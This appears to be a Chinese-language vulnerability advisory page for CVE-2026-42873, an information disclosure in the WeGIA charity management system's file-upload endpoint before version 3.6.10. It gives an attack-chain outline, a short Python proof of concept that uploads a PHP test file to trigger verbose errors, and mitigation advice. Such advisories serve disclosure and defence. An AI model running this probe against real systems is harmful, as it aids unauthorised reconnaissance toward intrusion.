CVE-2026-42873 CVSS 0.0 低危

CVE-2026-42873 WeGIA信息泄露漏洞

披露日期: 2026-05-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42873

漏洞类型

信息泄露

CVSS评分

0.0 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WeGIA

漏洞概述

WeGIA是一款用于慈善机构的Web管理系统。在3.6.10版本之前，当尝试向`funcionario/docdependente_upload.php`上传包含恶意内容的文件时，应用程序会返回过于详细的错误消息。这种不当的错误处理导致信息泄露，增加了攻击面，为攻击者提供了技术洞察以完善其攻击手段。该漏洞已在3.6.10版本中修复。

技术细节

该漏洞源于WeGIA在处理文件上传请求时的错误信息处理机制不当。攻击者需拥有低权限账号，向`funcionario/docdependente_upload.php`端点发送特制的文件上传请求（如包含恶意脚本或畸形的文件头）。服务器在处理失败时，未对错误信息进行脱敏处理，直接返回了包含服务器内部路径、调试详情或验证逻辑的响应。这些敏感信息可帮助攻击者更精准地构造攻击载荷，绕过其他防御机制，从而对系统安全构成进一步威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行WeGIA，并获取低权限用户账号。

STEP 2

2. 触发漏洞

攻击者向`funcionario/docdependente_upload.php`上传特制的恶意文件，故意触发文件校验失败。

STEP 3

3. 获取信息

捕获并分析服务器返回的错误响应，从中提取路径信息、配置细节等技术数据。

STEP 4

4. 后续利用

利用获取的技术细节优化攻击载荷，尝试进行更深入的渗透测试或攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-host/funcionario/docdependente_upload.php"

# Prepare a malicious file to trigger the error
# The content is designed to be rejected by the server
files = {
    'file': ('exploit_test.php', '<?php echo "malicious"; ?>', 'application/x-php')
}
data = {
    'other_param': 'value'
}

try:
    # Send POST request to upload endpoint
    response = requests.post(target_url, files=files, data=data)

    # Check if verbose error information is disclosed
    if response.status_code != 200 and "error" in response.text.lower():
        print("[+] Potential Information Disclosure Detected:")
        print(response.text)
    else:
        print("[-] No verbose error detected or upload succeeded.")

except Exception as e:
    print(f"Request failed: {e}")

影响范围

WeGIA < 3.6.10

防御指南

临时缓解措施

临时缓解措施包括在Web服务器或应用防火墙（WAF）层面拦截包含详细错误信息的响应，确保所有错误页面均为通用提示。同时，严格限制对文件上传接口的访问权限，仅允许授权IP或用户访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表